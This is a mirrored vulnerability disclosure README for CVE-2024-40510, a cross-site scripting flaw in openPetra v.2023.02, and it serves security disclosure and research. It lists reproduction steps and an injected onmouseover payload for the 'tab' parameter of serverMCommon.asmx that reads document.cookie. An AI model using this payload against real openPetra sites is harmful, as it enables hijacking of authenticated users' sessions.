CVE-2024-40510 PoC — OpenPetra 安全漏洞

Source

https://github.com/Jansen-C-Moreira/CVE-2024-40510

Associated Vulnerability

Title:OpenPetra 安全漏洞 (CVE-2024-40510)
Description:OpenPetra是OpenPetra公司的一个免费的管理软件。 OpenPetra 2023.02版本存在安全漏洞，该漏洞源于存在跨站脚本漏洞，允许远程攻击者通过serverMCommon.asmx函数获取敏感信息。

Description

OpenPetra v.2023.02 CVE-2024-40510

Readme

# CVE-2024-40510
# Cross Site Scripting vulnerability in openPetra v.2023.02 via the serverMCommon.asmx function.

**Description**: An unauthenticated user can steal cookies from authenticated user, by exploiting a XSS in openPetra v.2023.02 via the serverMCommon.asmx function.

**Vulnerable Product Version**: openPetra v.2023.02  
**CVE Author**: Jansen Moreira 
**Date**: 13/07/2024  
**CVE**: CVE-2024-40510  
**CVE Link**: https://www.cve.org/CVERecord?id=CVE-2024-40510  
**NVD Link**: https://nvd.nist.gov/vuln/detail/CVE-2024-40510     
**Tenable Link**: https://www.tenable.com/cve/CVE-2024-40510     
**Confirmed on**: 13/07/2024                               
**Tested on**: Linux  
### Steps to reproduce:  
1- Access the home Page  
2- Use the following path and add the xss payload in the tab parametrer. EX.:  ```http://target.com/api/serverMCommon.asmx?bnd=TMCommonWebServiceSoap&op=TFormTemplatesWebConnector_UploadFinanceFormTemplate&page=op&tab=x```         
3- Hover the mouse over the left index item to trigger the XSS  

**Payloads**:  
tab: x" onmouseover=alert(document.cookie) x="


Discoverer(s)/Credits:
Jansen Moreira

File Snapshot


 [4.0K]  /data/pocs/6acefa29ec383064d470f23bd82c8a307c1f4d84
└── [1.1K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!